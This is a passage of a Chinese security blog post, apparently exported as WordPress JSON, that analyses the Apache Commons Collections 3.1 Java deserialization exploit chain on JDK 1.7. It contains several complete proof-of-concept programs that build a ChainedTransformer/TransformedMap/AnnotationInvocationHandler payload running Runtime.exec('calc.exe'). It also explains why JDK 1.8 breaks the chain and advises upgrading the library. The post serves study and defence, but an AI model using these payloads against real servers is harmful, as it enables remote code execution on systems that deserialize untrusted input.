                      \u4ee5\u4e0a\u6700\u540e\u4e00\u6b65\u6709\u70b9\u590d\u6742\uff0cmethod\u5c31\u662finvoke\u65b9\u6cd5\uff0c\u76f8\u5f53\u4e8e\u4f7f\u7528invoke\u8c03\u7528\u4e86invoke\u51fd\u6570\u3002\u9996\u5148this.iMethodName, this.iParamTypes\u662f\u6839\u636einvoke\u63a5\u53e3\u800c\u5b9a\u7684\uff1a<\/p>\n

                      public Object invoke(Object obj, Object... args)\/\/this.iMethodName=\"invoke\"\/\/this.iParamTypes=new Class {Object.class, Object.class }\/\/\u5916\u9762class\u3001Object\u5c01\u88c5\u662fInvokerTransformer\u7c7b\u7684\u6784\u9020\u51fd\u6570\u8981\u6c42<\/p>\n

                      \u6309\u7167invoke\u4e2d\u7684input\u624d\u662f\u5b83\u8981\u8c03\u7528\u7684\u73af\u5883\u7684\u51c6\u5219\u3002invoke\u65b9\u6cd5.invoke(input, this.iArgs)\u5b9e\u9645\u4e0a\u7b49\u4e8einput.invoke(this.iArgs)\uff0c\u800cinput=getRuntime\u65b9\u6cd5\uff0c\u90a3\u4e48\u53ea\u8981\u586b\u5165this.iArgs\u5c31\u597d\u4e86<\/p>\n

                      \u53c8\u7531\u4e8egetRuntime\u662f\u4e2a\u9759\u6001\u51fd\u6570\uff0c\u4e0d\u7528\u592a\u7ea0\u7ed3\u8f93\u5165obj\uff0c\u5199\u4f5cnull\u3002getRuntime\u65b9\u6cd5\u4e0d\u9700\u8981\u53c2\u6570\u3002this.iArgs=null,new Object[0]<\/p>\n

                      \u90a3\u4e48\u6574\u5408\u5c31\u5982\u4e0b\uff1a<\/p>\n

                      Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), new InvokerTransformer(\"invoke\", new Class {Object.class, Object.class }, new Object {null, new Object[0] }), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})};<\/p>\n

                      \u4ee5\u4e0a\u4ee3\u7801\u5176\u5b9e\u5c31\u662f\u7b49\u540c\u4e8e((Runtime)Runtime.class.getMethod(\"getMethod\",null).invoke(null,null)).exec(\"calc.exe\");\u6211\u4eec\u7b3c\u7edf\u7684\u6765\u7406\u89e3\uff0c\u5b9e\u9645\u5c31\u662f\u5982\u4e0b(\u8fd9\u91cc\u5077\u4e00\u5f20orleven\u7684\u56fe)\uff1a<\/p>\n

                      \n \"apache\n <\/div>\n

                      \u603b\u4f53\u4e0a\u6765\u8bf4\uff1a\u5229\u7528\u4e86\u53cd\u5c04\u673a\u5236\u8c03\u7528\u53cd\u5c04\u673a\u5236\u7684\u51fd\u6570\uff0c\u7ed5\u8fc7\u4e86\u5f00\u5934cls\u53ea\u80fd\u4e3ajava.lang.Class\u7684\u9650\u5236\uff0c\u6839\u636e\u5177\u4f53\u73af\u5883input\u73af\u73af\u76f8\u6263\uff0c\u7279\u4e48\u7adf\u7136\u6070\u597d\u5c31\u901a\u4e86\u2026.\u975e\u5e38\u7684\u5fae\u5999\u2026.<\/p>\n

                      \u7b2c\u4e09\u6b65 TransformedMap<\/strong><\/p>\n

                      \u90a3\u4e48\u6211\u4eec\u5728\u7b2c\u4e8c\u6b65\u901a\u8fc7ConstantTransformer\u3001ChainedTransformer\u5c31\u5b8c\u6210\u4e86payload\u5728\u5ba2\u6237\u7aef\u81ea\u5b9a\u4e49\u8fd9\u4e00\u76ee\u6807\uff0c\u6211\u4eec\u770b\u4e00\u4e0b\u76ee\u524d\u7684\u653b\u51fb\u6d41\u7a0b<\/p>\n

                      public class commons_collections_3_1 { public static void main(String args) throws Exception { \/\/1.\u5ba2\u6237\u7aef\u6784\u5efa\u653b\u51fb\u4ee3\u7801\/\/\u6b64\u5904\u6784\u5efa\u4e86\u4e00\u4e2atransformers\u7684\u6570\u7ec4\uff0c\u5728\u5176\u4e2d\u6784\u5efa\u4e86\u4efb\u610f\u51fd\u6570\u6267\u884c\u7684\u6838\u5fc3\u4ee3\u7801Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), new InvokerTransformer(\"invoke\", new Class {Object.class, Object.class }, new Object {null, new Object[0] }), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})}; \/\/\u5c06transformers\u6570\u7ec4\u5b58\u5165ChaniedTransformer\u8fd9\u4e2a\u7ee7\u627f\u7c7bTransformer transformerChain = new ChainedTransformer(transformers); \/\/payload\u5e8f\u5217\u5316\u5199\u5165\u6587\u4ef6\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileOutputStream f = new FileOutputStream(\"payload.bin\");ObjectOutputStream fout = new ObjectOutputStream(f);fout.writeObject(transformerChain); \/\/2.\u670d\u52a1\u7aef\u8bfb\u53d6\u6587\u4ef6\uff0c\u53cd\u5e8f\u5217\u5316\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileInputStream fi = new FileInputStream(\"payload.bin\");ObjectInputStream fin = new ObjectInputStream(fi); \/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316\u6210ChainedTransformer\u683c\u5f0f\uff0c\u518d\u8c03\u7528transform\u51fd\u6570Transformer transformerChain_now = (ChainedTransformer) fin.readObject;transformerChain_now.transform(null);}}<\/p>\n

                      \n \"apache\n <\/div>\n

                      \u5b8c\u6210\u547d\u4ee4\u6267\u884c\u670d\u52a1\u7aef\u6267\u884c\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n

                        \n
                      1. \u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316\u6211\u4eec\u7684\u8f93\u5165\u6210ChainedTransformer\u7c7b\u578b<\/li>\n
                      2. \u8c03\u7528\u8fd9\u4e2a\u8f93\u5165\u7684transform\u51fd\u6570<\/li>\n<\/ol>\n

                        \u8f6c\u53d8\u7684\u7c7b\u578b\u662f\u4e00\u4e2a\u6570\u636e\u8f6c\u5316\u94fe\u6570\u636e\u683c\u5f0f\uff0c\u5f88\u660e\u663e\u670d\u52a1\u7aef\u4e0d\u53ef\u80fd\u5b58\u5728\u8fd9\u79cd\u4ee3\u7801\uff0c\u5229\u7528\u4ef7\u503c\u4e0d\u8db3\uff0c\u63a5\u4e0b\u6765\u6211\u4eec\u9700\u8981\u7ee7\u7eed\u5ef6\u957f\u8fd9\u4e2a\u6f0f\u6d1e\u94fe\u3002<\/p>\n

                        \u5c01\u88c5\u6210Map<\/strong><\/p>\n

                        \u7531\u4e8e\u6211\u4eec\u5f97\u5230\u7684\u662fChainedTransformer\uff0c\u4e00\u4e2a\u8f6c\u6362\u94fe\uff0cTransformedMap\u7c7b\u63d0\u4f9b\u5c06map\u548c\u8f6c\u6362\u94fe\u7ed1\u5b9a\u7684\u6784\u9020\u51fd\u6570\uff0c\u53ea\u9700\u8981\u6dfb\u52a0\u6570\u636e\u81f3map\u4e2d\u5c31\u4f1a\u81ea\u52a8\u8c03\u7528\u8fd9\u4e2a\u8f6c\u6362\u94fe\u6267\u884cpayload\u3002<\/p>\n

                        \u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u628a\u89e6\u53d1\u6761\u4ef6\u4ece\u663e\u6027\u7684\u8c03\u7528\u8f6c\u6362\u94fe\u7684transform\u51fd\u6570\u5ef6\u4f38\u5230\u4fee\u6539map\u7684\u503c\u3002\u5f88\u660e\u663e\u540e\u8005\u662f\u4e00\u4e2a\u5e38\u89c4\u64cd\u4f5c\uff0c\u6781\u6709\u53ef\u80fd\u88ab\u89e6\u53d1\u3002<\/p>\n

                        TransformedMap<\/p>\n

                        public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) { return new TransformedMap(map, keyTransformer, valueTransformer);}<\/p>\n

                        try\u4e00\u4e0b\uff1a<\/p>\n

                        public static void main(String args) throws Exception { \/\/1.\u5ba2\u6237\u7aef\u6784\u5efa\u653b\u51fb\u4ee3\u7801\/\/\u6b64\u5904\u6784\u5efa\u4e86\u4e00\u4e2atransformers\u7684\u6570\u7ec4\uff0c\u5728\u5176\u4e2d\u6784\u5efa\u4e86\u4efb\u610f\u51fd\u6570\u6267\u884c\u7684\u6838\u5fc3\u4ee3\u7801Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), new InvokerTransformer(\"invoke\", new Class {Object.class, Object.class }, new Object {null, new Object[0] }), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})}; \/\/\u5c06transformers\u6570\u7ec4\u5b58\u5165ChaniedTransformer\u8fd9\u4e2a\u7ee7\u627f\u7c7bTransformer transformerChain = new ChainedTransformer(transformers); \/\/\u521b\u5efaMap\u5e76\u7ed1\u5b9atransformerChinaMap innerMap = new HashMap;innerMap.put(\"value\", \"value\"); \/\/\u7ed9\u4e88map\u6570\u636e\u8f6c\u5316\u94feMap outerMap = TransformedMap.decorate(innerMap, null, transformerChain); \/\/payload\u5e8f\u5217\u5316\u5199\u5165\u6587\u4ef6\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileOutputStream f = new FileOutputStream(\"payload.bin\");ObjectOutputStream fout = new ObjectOutputStream(f);fout.writeObject(outerMap); \/\/2.\u670d\u52a1\u7aef\u63a5\u53d7\u53cd\u5e8f\u5217\u5316\uff0c\u51fa\u53d1\u6f0f\u6d1e\/\/\u8bfb\u53d6\u6587\u4ef6\uff0c\u53cd\u5e8f\u5217\u5316\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileInputStream fi = new FileInputStream(\"payload.bin\");ObjectInputStream fin = new ObjectInputStream(fi); \/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316\u6210Map\u683c\u5f0f\uff0c\u518d\u8c03\u7528transform\u51fd\u6570Map outerMap_now = (Map)fin.readObject; \/\/2.1\u53ef\u4ee5\u76f4\u63a5map\u6dfb\u52a0\u65b0\u503c\uff0c\u89e6\u53d1\u6f0f\u6d1e\/\/outerMap_now.put(\"123\", \"123\");\/\/2.2\u4e5f\u53ef\u4ee5\u83b7\u53d6map\u952e\u503c\u5bf9\uff0c\u4fee\u6539value\uff0cvalue\u4e3avalue\uff0cfoobar,\u89e6\u53d1\u6f0f\u6d1eMap.Entry onlyElement = (Map.Entry) outerMap.entrySet.iterator.next;onlyElement.setValue(\"foobar\");}<\/p>\n

                        \u4eb2\u6d4b\u6709\u6548<\/p>\n

                        \u7b2c\u56db\u6b65 jdk1.7 AnnotationInvocationHandler\u7684readObject\u590d\u5199\u70b9<\/strong><\/p>\n

                        \u4e0a\u9762\u7684\u6f0f\u6d1e\u89e6\u53d1\u6761\u4ef6\u4ecd\u7136\u4e0d\u591f\u5b8c\u7f8e\uff0c\u9700\u8981\u670d\u52a1\u7aef\u628a\u6211\u4eec\u4f20\u5165\u7684\u5e8f\u5217\u5316\u5185\u5bb9\u53cd\u5e8f\u5217\u5316\u4e3amap\uff0c\u5e76\u5bf9\u503c\u8fdb\u884c\u4fee\u6539\u3002\u4e4b\u524d\u4e5f\u8bf4\u8fc7\u5b8c\u7f8e\u7684\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u8fd8\u9700\u8981\u4e00\u4e2areadobject\u590d\u5199\u70b9\uff0c\u4f7f\u53ea\u8981\u670d\u52a1\u7aef\u6267\u884c\u4e86readObject\u51fd\u6570\u5c31\u7b49\u4e8e\u547d\u4ee4\u6267\u884c\u3002<\/p>\n

                        \u5728jdk1.7\u4e2d\u5c31\u5b58\u5728\u4e00\u4e2a\u5b8c\u7f8e\u7684readobject\u590d\u5199\u70b9\u7684\u7c7bsun.reflect.annotation.AnnotationInvocationHandler\u3002\u6211\u5011\u5148\u770b\u4ed6\u7684\u6784\u9020\u51fd\u6570<\/p>\n

                        AnnotationInvocationHandler(Class extends Annotation> var1, Map var2) {Class var3 = var1.getInterfaces; if (var1.isAnnotation && var3.length == 1 && var3[0] == Annotation.class) {\/\/var1\u6ee1\u8db3\u8fd9\u4e2aif\u6761\u4ef6\u65f6this.type = var1;\/\/\u4f20\u5165\u7684var1\u5230this.typethis.memberValues = var2;\/\/\u6211\u4eec\u7684map\u4f20\u5165this.memberValues} else { throw new AnnotationFormatError(\"Attempt to create proxy for a non-annotation type.\");}}<\/p>\n

                        readobject\u590d\u5199\u51fd\u6570\uff1a<\/p>\n

                        private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { \/\/\u9ed8\u8ba4\u53cd\u5e8f\u5217\u5316var1.defaultReadObject;AnnotationType var2 = null; try {var2 = AnnotationType.getInstance(this.type);} catch (IllegalArgumentException var9) { throw new InvalidObjectException(\"Non-annotation type in annotation serial stream\");}Map var3 = var2.memberTypes;\/\/Iterator var4 = this.memberValues.entrySet.iterator;\/\/\u83b7\u53d6\u6211\u4eec\u6784\u9020map\u7684\u8fed\u4ee3\u5668while(var4.hasNext) {Entry var5 = (Entry)var4.next;\/\/\u904d\u5386map\u8fed\u4ee3\u5668String var6 = (String)var5.getKey;\/\/\u83b7\u53d6key\u7684\u540d\u79f0Class var7 = (Class)var3.get(var6);\/\/\u83b7\u53d6var2\u4e2d\u76f8\u5e94key\u7684class\u7c7b\uff1f\u8fd9\u8fb9\u5177\u4f53var3\u662f\u4ec0\u4e48\u4e2a\u542b\u4e49\u4e0d\u592a\u61c2\uff0c\u4f46\u662f\u80af\u5b9avar7\u30018\u4e24\u8005\u4e0d\u4e00\u6837if (var7 != null) {Object var8 = var5.getValue;\/\/\u83b7\u53d6map\u7684valueif (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) { \/\/\u4e24\u8005\u7c7b\u578b\u4e0d\u4e00\u81f4\uff0c\u7ed9var5\u8d4b\u503c\uff01\uff01\u5177\u4f53\u8d4b\u503c\u4ec0\u4e48\u5df2\u7ecf\u4e0d\u5173\u952e\u4e86\uff01\u53ea\u8981\u8d4b\u503c\u4e86\u5c31\u4ee3\u8868\u6267\u884c\u547d\u4ee4\u6210\u529fvar5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass + \"[\" + var8 + \"]\")).setMember((Method)var2.members.get(var6)));}}}}}<\/p>\n

                        \u867d\u7136\u76f8\u5bf9\u4e8e\u8fd9\u4e2a\u7c7b\u5177\u4f53\u505a\u4ec0\u4e48\uff0c\u5b9e\u5728\u662f\u6ca1\u6709\u7cbe\u529b\u53bb\u641e\u6e05\u695a\u4e86\uff0c\u4f46\u662f\u5b83\u6700\u7ec8\u5bf9\u4e8e\u6211\u4eec\u4f20\u5165\u6784\u9020\u51fd\u6570\u7684map\u8fdb\u884c\u904d\u5386\u8d4b\u503c\u3002\u8fd9\u6837\u5c31\u5f25\u8865\u4e86\u6211\u4eec\u4e4b\u524d\u53cd\u5e8f\u5217\u5316\u9700\u8981\u670d\u52a1\u7aef\u5b58\u5728\u4e00\u4e9b\u6761\u4ef6\u7684\u4e0d\u8db3\uff0c\u5f62\u6210\u5b8c\u7f8e\u53cd\u5e8f\u5217\u5316\u653b\u51fb\u3002<\/p>\n

                        \u6700\u7ec8\u6a21\u62df\u653b\u51fb\u4ee3\u7801<\/p>\n

                        public static void main(String args) throws Exception { \/\/1.\u5ba2\u6237\u7aef\u6784\u5efa\u653b\u51fb\u4ee3\u7801\/\/\u6b64\u5904\u6784\u5efa\u4e86\u4e00\u4e2atransformers\u7684\u6570\u7ec4\uff0c\u5728\u5176\u4e2d\u6784\u5efa\u4e86\u4efb\u610f\u51fd\u6570\u6267\u884c\u7684\u6838\u5fc3\u4ee3\u7801Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), new InvokerTransformer(\"invoke\", new Class {Object.class, Object.class }, new Object {null, new Object[0] }), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})}; \/\/\u5c06transformers\u6570\u7ec4\u5b58\u5165ChaniedTransformer\u8fd9\u4e2a\u7ee7\u627f\u7c7bTransformer transformerChain = new ChainedTransformer(transformers); \/\/\u521b\u5efaMap\u5e76\u7ed1\u5b9atransformerChinaMap innerMap = new HashMap;innerMap.put(\"value\", \"value\"); \/\/\u7ed9\u4e88map\u6570\u636e\u8f6c\u5316\u94feMap outerMap = TransformedMap.decorate(innerMap, null, transformerChain); \/\/\u53cd\u5c04\u673a\u5236\u8c03\u7528AnnotationInvocationHandler\u7c7b\u7684\u6784\u9020\u51fd\u6570Class cl = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\");Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); \/\/\u53d6\u6d88\u6784\u9020\u51fd\u6570\u4fee\u9970\u7b26\u9650\u5236ctor.setAccessible(true); \/\/\u83b7\u53d6AnnotationInvocationHandler\u7c7b\u5b9e\u4f8bObject instance = ctor.newInstance(Target.class, outerMap); \/\/payload\u5e8f\u5217\u5316\u5199\u5165\u6587\u4ef6\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileOutputStream f = new FileOutputStream(\"payload.bin\");ObjectOutputStream fout = new ObjectOutputStream(f);fout.writeObject(instance); \/\/2.\u670d\u52a1\u7aef\u8bfb\u53d6\u6587\u4ef6\uff0c\u53cd\u5e8f\u5217\u5316\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileInputStream fi = new FileInputStream(\"payload.bin\");ObjectInputStream fin = new ObjectInputStream(fi); \/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316fin.readObject;}<\/p>\n

                        \u6210\u529f<\/p>\n

                        \n \"apache\n <\/div>\n

                        \u81f3\u6b64\uff0c\u6211\u4eec\u5728\u5ba2\u6237\u7aef\u6784\u9020\u4e86payload\u53d1\u9001\u81f3\u670d\u52a1\u7aef\uff0c\u53ea\u8981\u670d\u52a1\u7aef<\/p>\n

                          \n
                        1. \u5bf9\u6211\u4eec\u7684\u8f93\u5165\u8fdb\u884c\u53cd\u5e8f\u5217\u5316<\/li>\n
                        2. jdk\u7248\u672c\u4e3a1.7<\/li>\n<\/ol>\n

                          \u5c31\u53ef\u4ee5\u76f4\u63a5\u5b8c\u6210\u547d\u4ee4\u6267\u884c\uff0c\u5b8c\u7f8e\uff01<\/p>\n

                          jdk1.8\u4e3a\u4ec0\u4e48\u4e0d\u884c\u5462<\/strong><\/p>\n

                          \u90a3\u4e48jdk1.8\u4e3a\u5565\u4e0d\u884c\u5462,\u770b\u4e00\u4e0bjdk8\u91cc\u9762\u7684sun.reflect.annotation.AnnotationInvocationHandler readObject\u590d\u5199\u70b9\uff1a<\/p>\n

                          private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {GetField var2 = var1.readFields;Class var3 = (Class)var2.get(\"type\", (Object)null);Map var4 = (Map)var2.get(\"memberValues\", (Object)null);AnnotationType var5 = null; try {var5 = AnnotationType.getInstance(var3);} catch (IllegalArgumentException var13) { throw new InvalidObjectException(\"Non-annotation type in annotation serial stream\");}Map var6 = var5.memberTypes;LinkedHashMap var7 = new LinkedHashMap;String var10;Object var11; for(Iterator var8 = var4.entrySet.iterator; var8.hasNext; var7.put(var10, var11)) {Entry var9 = (Entry)var8.next;var10 = (String)var9.getKey;var11 = null;Class var12 = (Class)var6.get(var10); if (var12 != null) {var11 = var9.getValue; if (!var12.isInstance(var11) && !(var11 instanceof ExceptionProxy)) { \/\/\u5f88\u4f24\u5fc3\u7684\uff0c\u6ca1\u6709\u4e86map\u8d4b\u503c\u8bed\u53e5var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass + \"[\" + var11 + \"]\")).setMember((Method)var5.members.get(var10));}}}<\/p>\n

                          \u56e0\u4e3a\u8fd9\u4e2a\u51fd\u6570\u51fa\u73b0\u4e86\u53d8\u52a8\uff0c\u4e0d\u518d\u6709\u8d4b\u503c\u8bed\u53e5\uff0c\u6240\u4ee5\u89e6\u53d1\u4e0d\u4e86\u6f0f\u6d1e\u3002<\/p>\n

                          No.6\u5199\u5728\u540e\u9762<\/strong><\/p>\n

                          \u81f3\u6b64\u6211\u4eec\u5c31\u5b8c\u6210common-collection 3.1\u7248\u672c jdk1.7\u7248\u672c\u4e0b\u7684POC\u590d\u73b0\u548c\u5229\u7528\u94fe\u5206\u6790\u3002\u5f53\u7136\u8fd8\u6709common-collection \u4e0d\u540c\u7ec4\u4ef6\u7248\u672c\uff0c\u4e0d\u540c\u73af\u5883\u4e0bpoc\u548c\u5229\u7528\u94fe\u5747\u6709\u4e0d\u540c\uff0c\u5728ysoserial\u4e0b\u5c31\u67097\uff0c8\u4e2d\u5229\u7528\u65b9\u5f0f\u3002\u8fd8\u53ef\u4ee5\u901a\u8fc7rmi\u6a21\u5f0f\u8fdb\u884c\u5229\u7528\u7b49\u3002<\/p>\n

                          \u4f46\u662f\u7531\u4e8e\u8fd9\u7bc7\u535a\u5ba2\u5199\u7684\u592a\u957f\u4e86\uff0c\u601d\u8def\u4e5f\u4e00\u76f4\u65ad\u65ad\u7eed\u7eed\uff0c\u5176\u4ed6\u5185\u5bb9\u4e4b\u540e\u518d\u9646\u7eed\u5b66\u4e60\u5206\u6790\u5427~<\/p>\n

                          No.7\u4fee\u590d\u610f\u89c1<\/strong><\/p>\n

                          commons-collections\u7ec4\u4ef6\u7248\u672c \u5347\u7ea7\u81f3\u5b98\u65b9\u6700\u65b0\u7248\u672c<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"apache commons\u5305_JAVA\u53cd\u5e8f\u5217\u5316 - commons-collections - 1\u4ee5\u4e0b\u6587\u7ae0\u6765\u6e90\u4e8e\u96f7\u795e\u4f17\u6d4b\uff0c\u4f5c\u8005lalaNo.1\u58f0\u660e\u7531\u4e8e\u4f20\u64ad\u3001\u5229\u7528\u6b64\u6587\u6240\u63d0...","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"_links":{"self":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/7502"}],"collection":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/comments?post=7502"}],"version-history":[{"count":0,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/7502\/revisions"}],"wp:attachment":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/media?parent=7502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/categories?post=7502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/tags?post=7502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}